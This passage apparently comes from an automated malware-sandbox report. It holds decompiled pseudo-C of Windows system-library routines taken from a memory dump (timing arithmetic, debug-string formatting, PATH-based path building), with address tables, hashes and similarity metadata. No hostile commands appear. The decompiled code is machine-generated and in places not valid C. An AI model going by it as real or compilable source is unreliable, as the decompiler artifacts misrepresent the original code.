				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x19dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01907D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E019B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01929E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0192B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0192CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01907D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E019B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0192AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x19d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x19d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x19d8628; // 0x0
							_t116 =  *0x19d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                              0x0190b94c
                                              0x0190b956
                                              0x0190b95c
                                              0x0190b95e
                                              0x0190b964
                                              0x0190b969
                                              0x0190b96d
                                              0x0190b96d
                                              0x0190b970
                                              0x0190b974
                                              0x0190b97a
                                              0x0190badf
                                              0x0190badf
                                              0x0190bae2
                                              0x0190bae4
                                              0x0190bae6
                                              0x0190baf0
                                              0x01952cb8
                                              0x0190baf6
                                              0x0190baf6
                                              0x0190baf6
                                              0x0190bafd
                                              0x0190bb1f
                                              0x0190bb1f
                                              0x0190baff
                                              0x0190bb00
                                              0x0190bb00
                                              0x0190bb03
                                              0x0190bb03
                                              0x0190bacb
                                              0x0190bacf
                                              0x0190bad0
                                              0x0190bad1
                                              0x0190badc
                                              0x0190badc
                                              0x0190b980
                                              0x0190b980
                                              0x0190b988
                                              0x0190b98b
                                              0x0190b98d
                                              0x0190b990
                                              0x0190b993
                                              0x0190b999
                                              0x0190b99b
                                              0x0190b9a1
                                              0x0190b9a5
                                              0x0190b9aa
                                              0x0190b9b0
                                              0x0190b9bb
                                              0x0190b9c0
                                              0x0190b9c3
                                              0x0190b9ca
                                              0x0190b9cc
                                              0x0190b9cf
                                              0x0190b9d3
                                              0x0190b9d7
                                              0x0190ba94
                                              0x0190ba94
                                              0x0190ba98
                                              0x0190baa3
                                              0x01952ccb
                                              0x0190baa9
                                              0x0190baa9
                                              0x0190baa9
                                              0x0190bab1
                                              0x01952cd5
                                              0x01952cdd
                                              0x01952cdd
                                              0x0190babb
                                              0x0190babc
                                              0x0190bac2
                                              0x0190bac3
                                              0x0190bac3
                                              0x0190bac6
                                              0x00000000
                                              0x0190b9dd
                                              0x0190b9dd
                                              0x0190b9e7
                                              0x0190b9e7
                                              0x0190b9ec
                                              0x0190b9ec
                                              0x0190b9f1
                                              0x0190b9f5
                                              0x0190b9fa
                                              0x0190ba00
                                              0x0190ba0c
                                              0x0190ba10
                                              0x0190ba10
                                              0x0190ba12
                                              0x0190ba18
                                              0x00000000
                                              0x00000000
                                              0x0190bb26
                                              0x0190bb26
                                              0x0190ba1e
                                              0x0190ba1e
                                              0x0190ba23
                                              0x0190ba25
                                              0x0190ba2c
                                              0x0190ba30
                                              0x0190ba35
                                              0x0190ba35
                                              0x0190ba41
                                              0x0190ba46
                                              0x0190ba4c
                                              0x0190ba50
                                              0x0190ba54
                                              0x0190ba6a
                                              0x0190ba6e
                                              0x0190ba70
                                              0x0190ba74
                                              0x0190ba78
                                              0x0190ba7a
                                              0x0190ba7c
                                              0x0190ba8e
                                              0x0190ba90
                                              0x0190ba92
                                              0x0190bb14
                                              0x0190bb14
                                              0x0190bb16
                                              0x0190bb16
                                              0x00000000
                                              0x0190ba7c
                                              0x0190bb0a
                                              0x0190bb0d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0190bb0f

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0190B9A5
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 885266447-0
                                              • Opcode ID: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                              • Instruction ID: b5390e925eb39b181f40a5e1c3f20ddc7e34055d576a2095a24e534f6182f676
                                              • Opcode Fuzzy Hash: d342a66e0ba1145fbca4cc04a04c78d6188a720b42d93e73e3fd173c834fec2b
                                              • Instruction Fuzzy Hash: 6B516C75A08301CFC722CF69C08092ABBE9FB88715F54496EE59A97385D730E884CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018EB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E018EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x19bf7a8);
				E0193D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0193D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0192D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0192F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0193DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0192B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0192B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0192E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0192A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                              0x018eb171
                                              0x018eb171
                                              0x018eb171
                                              0x018eb171
                                              0x018eb171
                                              0x018eb176
                                              0x018eb17b
                                              0x018eb180
                                              0x018eb186
                                              0x018eb18f
                                              0x018eb198
                                              0x018eb1a4
                                              0x018eb1aa
                                              0x01944802
                                              0x01944802
                                              0x01944805
                                              0x0194480c
                                              0x0194480e
                                              0x018eb1d1
                                              0x018eb1d3
                                              0x018eb1de
                                              0x018eb1de
                                              0x01944817
                                              0x0194481e
                                              0x01944820
                                              0x01944822
                                              0x01944822
                                              0x01944824
                                              0x01944824
                                              0x0194482a
                                              0x00000000
                                              0x00000000
                                              0x01944835
                                              0x0194483a
                                              0x0194483d
                                              0x0194483f
                                              0x01944842
                                              0x01944842
                                              0x01944842
                                              0x01944846
                                              0x0194484c
                                              0x0194484e
                                              0x01944851
                                              0x01944851
                                              0x01944853
                                              0x01944854
                                              0x01944854
                                              0x01944858
                                              0x0194485a
                                              0x0194485a
                                              0x0194485d
                                              0x0194485f
                                              0x01944861
                                              0x01944861
                                              0x01944866
                                              0x0194486b
                                              0x0194486e
                                              0x01944871
                                              0x01944876
                                              0x01944876
                                              0x01944878
                                              0x0194487b
                                              0x01944884
                                              0x01944884
                                              0x00000000
                                              0x0194487d
                                              0x0194487d
                                              0x01944882
                                              0x01944889
                                              0x01944889
                                              0x0194488f
                                              0x01944891
                                              0x019448e0
                                              0x019448e2
                                              0x019448e4
                                              0x019448e4
                                              0x019448e7
                                              0x019448e7
                                              0x019448ed
                                              0x019448f4
                                              0x019448f6
                                              0x01944951
                                              0x01944951
                                              0x01944953
                                              0x01944953
                                              0x01944956
                                              0x01944956
                                              0x01944958
                                              0x01944959
                                              0x01944959
                                              0x0194495d
                                              0x0194495d
                                              0x0194495f
                                              0x0194495f
                                              0x01944965
                                              0x01944969
                                              0x019449ba
                                              0x019449ba
                                              0x019449c1
                                              0x019449c5
                                              0x019449cc
                                              0x019449d4
                                              0x019449d7
                                              0x019449da
                                              0x019449e4
                                              0x019449e5
                                              0x019449f3
                                              0x01944a02
                                              0x00000000
                                              0x01944a02
                                              0x01944972
                                              0x01944974
                                              0x00000000
                                              0x00000000
                                              0x01944976
                                              0x01944979
                                              0x01944982
                                              0x01944983
                                              0x01944984
                                              0x0194498b
                                              0x0194498d
                                              0x01944991
                                              0x01944993
                                              0x01944999
                                              0x0194499d
                                              0x019449a2
                                              0x019449a2
                                              0x019449a2
                                              0x01944999
                                              0x019449ac
                                              0x00000000
                                              0x019449b3
                                              0x019448f8
                                              0x019448fe
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019448fe
                                              0x01944895
                                              0x0194489c
                                              0x019448ad
                                              0x019448b2
                                              0x019448b5
                                              0x019448b7
                                              0x019448ba
                                              0x019448bc
                                              0x019448c6
                                              0x019448c6
                                              0x019448cb
                                              0x019448d1
                                              0x019448d4
                                              0x019448d8
                                              0x019448d8
                                              0x00000000
                                              0x019448d8
                                              0x019448be
                                              0x019448c0
                                              0x00000000
                                              0x00000000
                                              0x019448c2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019448c4
                                              0x00000000
                                              0x01944882
                                              0x0194487b
                                              0x01944904
                                              0x01944906
                                              0x00000000
                                              0x00000000
                                              0x01944908
                                              0x0194490e
                                              0x00000000
                                              0x00000000
                                              0x01944910
                                              0x01944917
                                              0x01944917
                                              0x00000000
                                              0x01944917
                                              0x018eb1ba
                                              0x019447f9
                                              0x019447fc
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019447fc
                                              0x018eb1c0
                                              0x018eb1c0
                                              0x018eb1c3
                                              0x018eb1cb
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: _vswprintf_s
                                              • String ID:
                                              • API String ID: 677850445-0
                                              • Opcode ID: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                              • Instruction ID: 00f0c8458247485828571b61ddcab353c227e5bdc14dc0f7f784f84544f4396f
                                              • Opcode Fuzzy Hash: 7a26eb6d9c2ebc26f8988f94ee53238038726c1106adacfdb306b020d2ae369a
                                              • Instruction Fuzzy Hash: CC51FD75D0026A8BEB35CF688845FAEBBF4BF40715F2042A9D85DAB282C7304941DB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01912581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E01912581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1530200461, char _a1546912141) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t254;
				signed int _t258;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;
				signed int _t274;
				signed int _t276;
				intOrPtr _t278;
				signed int _t281;
				signed int _t288;
				signed int _t291;
				signed int _t299;
				intOrPtr _t305;
				signed int _t307;
				signed int _t309;
				void* _t310;
				void* _t311;
				signed int _t312;
				unsigned int _t315;
				signed int _t319;
				void* _t320;
				void* _t325;
				signed int _t328;
				signed int _t332;
				intOrPtr _t344;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t360;
				signed int _t361;
				intOrPtr* _t363;
				signed int _t364;
				signed int _t366;
				signed int _t372;
				void* _t373;
				void* _t375;

				_t366 = _t372;
				_t373 = _t372 - 0x4c;
				_v8 =  *0x19dd360 ^ _t366;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t360 = 0x19db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t315 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t305 = 0x48;
				_t342 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t353 = 0;
				_v37 = _t342;
				if(_v48 <= 0) {
					L16:
					_t45 = _t305 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t361 = 0xc0000106;
						goto L32;
					} else {
						_t360 = L01904620(_t315,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t305);
						_v52 = _t360;
						__eflags = _t360;
						if(_t360 == 0) {
							_t361 = 0xc0000017;
							goto L32;
						} else {
							 *(_t360 + 0x44) =  *(_t360 + 0x44) & 0x00000000;
							_t50 = _t360 + 0x48; // 0x48
							_t355 = _t50;
							_t342 = _v32;
							 *((intOrPtr*)(_t360 + 0x3c)) = _t305;
							_t307 = 0;
							 *((short*)(_t360 + 0x30)) = _v48;
							__eflags = _t342;
							if(_t342 != 0) {
								 *(_t360 + 0x18) = _t355;
								__eflags = _t342 - 0x19d8478;
								 *_t360 = ((0 | _t342 == 0x019d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0192F3E0(_t355,  *((intOrPtr*)(_t342 + 4)),  *_t342 & 0x0000ffff);
								_t342 = _v32;
								_t373 = _t373 + 0xc;
								_t307 = 1;
								__eflags = _a8;
								_t355 = _t355 + (( *_t342 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t299 = E019739F2(_t355);
									_t342 = _v32;
									_t355 = _t299;
								}
							}
							_t319 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t361 = _v68;
								__eflags = 0;
								 *((short*)(_t355 - 2)) = 0;
								goto L32;
							} else {
								_t309 = _t360 + _t307 * 4;
								_v56 = _t309;
								do {
									__eflags = _t342;
									if(_t342 != 0) {
										_t254 =  *(_v60 + _t319 * 4);
										__eflags = _t254;
										if(_t254 == 0) {
											goto L30;
										} else {
											__eflags = _t254 == 5;
											if(_t254 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t309 =  *(_v60 + _t319 * 4);
										 *(_t309 + 0x18) = _t355;
										_t258 =  *(_v60 + _t319 * 4);
										__eflags = _t258 - 8;
										if(_t258 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t258 * 4 +  &M01912959))) {
												case 0:
													__ax =  *0x19d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0192F3E0(__edi,  *0x19d848c, __ax & 0x0000ffff);
														__eax =  *0x19d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0192F3E0(_t355, _v80, _v64);
													_t294 = _v64;
													goto L26;
												case 2:
													 *0x19d8480 & 0x0000ffff = E0192F3E0(__edi,  *0x19d8484,  *0x19d8480 & 0x0000ffff);
													__eax =  *0x19d8480 & 0x0000ffff;
													__eax = ( *0x19d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0192F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0192F3E0(_t355, _v76, _v36);
														_t294 = _v36;
													}
													L26:
													_t373 = _t373 + 0xc;
													_t355 = _t355 + (_t294 >> 1) * 2 + 2;
													__eflags = _t355;
													L27:
													_push(0x3b);
													_pop(_t296);
													 *((short*)(_t355 - 2)) = _t296;
													goto L28;
												case 6:
													__ebx = "\\Wow\\Wow";
													__eflags = __ebx - "\\Wow\\Wow";
													if(__ebx != "\\Wow\\Wow") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0192F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\Wow\\Wow";
														} while (__ebx != "\\Wow\\Wow");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x19d8478 & 0x0000ffff = E0192F3E0(__edi,  *0x19d847c,  *0x19d8478 & 0x0000ffff);
													__eax =  *0x19d8478 & 0x0000ffff;
													__eax = ( *0x19d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E019739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x19d6e58 & 0x0000ffff = E0192F3E0(__edi,  *0x19d6e5c,  *0x19d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x19d6e58 & 0x0000ffff;
													__eax = ( *0x19d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t319 = _v16;
													_t342 = _v32;
													L29:
													_t309 = _t309 + 4;
													__eflags = _t309;
													_v56 = _t309;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t319 = _t319 + 1;
									_v16 = _t319;
									__eflags = _t319 - _v48;
								} while (_t319 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t258 =  *(_v60 + _t353 * 4);
						if(_t258 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t258 * 4 +  &M01912935))) {
							case 0:
								__ax =  *0x19d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t342 =  &_v64;
								_v80 = E01912E3E(0,  &_v64);
								_t305 = _t305 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x19d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x19d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E018FEEF0(0x19d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E018FEB70(__ecx, 0x19d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t232 = _v72;
											__eflags = _t232;
											if(_t232 != 0) {
												L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t232);
											}
											_t233 = _v52;
											__eflags = _t233;
											if(_t233 != 0) {
												__eflags = _t361;
												if(_t361 < 0) {
													L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t233);
													_t233 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t315 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x19d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01904620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E018FEB70(__ecx, 0x19d79a0);
										__eax = _v52;
										L36:
										_pop(_t354);
										_pop(_t362);
										__eflags = _v8 ^ _t366;
										_pop(_t306);
										return E0192B640(_t233, _t306, _v8 ^ _t366, _t342, _t354, _t362);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
